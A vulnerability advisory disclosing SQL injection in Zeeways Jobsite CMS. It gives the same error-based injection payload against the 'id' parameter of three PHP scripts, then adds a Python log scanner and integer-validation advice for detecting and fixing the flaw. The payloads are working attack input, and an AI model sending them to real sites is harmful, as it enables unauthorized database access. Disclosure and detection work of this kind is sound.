
"Zeeways Jobsite CMS - 'id' SQL Injection"

Author: "Ahmet Ümit BAYRAM"

Platform: php

Release date: 2019-03-25

# Exploit Title: Zeeways Jobsite CMS - 'id' SQL Injection
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.zeeways.com/jobsite-cms/1/productdetail
# Demo Site: http://www.zeewayscms.com/jobsite/
# Version: Latest
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/news_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/jobs_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#

----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/job_cmp_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#
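
Added example (not part of the original advisory): a Python check over web-server access logs that flags requests to the three scripts named in the PoCs whenever the id parameter is not a plain integer. The Common Log Format layout, the /jobsite/ path prefix and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The three scripts named in the PoCs above.
AFFECTED = {"news_details.php", "jobs_details.php", "job_cmp_details.php"}
# Assumed Common Log Format: client ... "METHOD target PROTOCOL" status
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def suspicious_id(target):
    """Return the decoded id value if the request hits an affected script
    with an id that is not a plain non-negative integer, else None."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in AFFECTED:
        return None
    # parse_qs percent-decodes values; keep_blank_values catches "id=".
    # Every occurrence is checked, so a repeated id parameter cannot hide one.
    values = parse_qs(parts.query, keep_blank_values=True).get("id", [])
    for value in values:
        if not re.fullmatch(r"\d{1,10}", value):
            return value
    return None

def scan(lines):
    """Return (client, status, decoded_id) for each flagged log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        bad = suspicious_id(target)
        if bad is not None:
            hits.append((client, int(status), bad))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Mar/2019:10:00:01 +0000] "GET /jobsite/news_details.php?id=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [25/Mar/2019:10:00:05 +0000] "GET /jobsite/jobs_details.php?id=-5236%22%20OR%201%20GROUP%20BY%20CONCAT(0x716a627871,FLOOR(RAND(0)*2))%23 HTTP/1.1" 500 310',
    '203.0.113.9 - - [25/Mar/2019:10:00:09 +0000] "GET /jobsite/job_cmp_details.php?id=7&id=7%22 HTTP/1.1" 200 4800',
    '198.51.100.4 - - [25/Mar/2019:10:00:12 +0000] "GET /jobsite/index.php?id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, status, value in scan(SAMPLE_LOG):
        print(f"{client} status={status} id={value!r}")
```

The same integer-only rule used here for detection is the input check the affected scripts would need before the id value reaches a query, alongside parameterized statements.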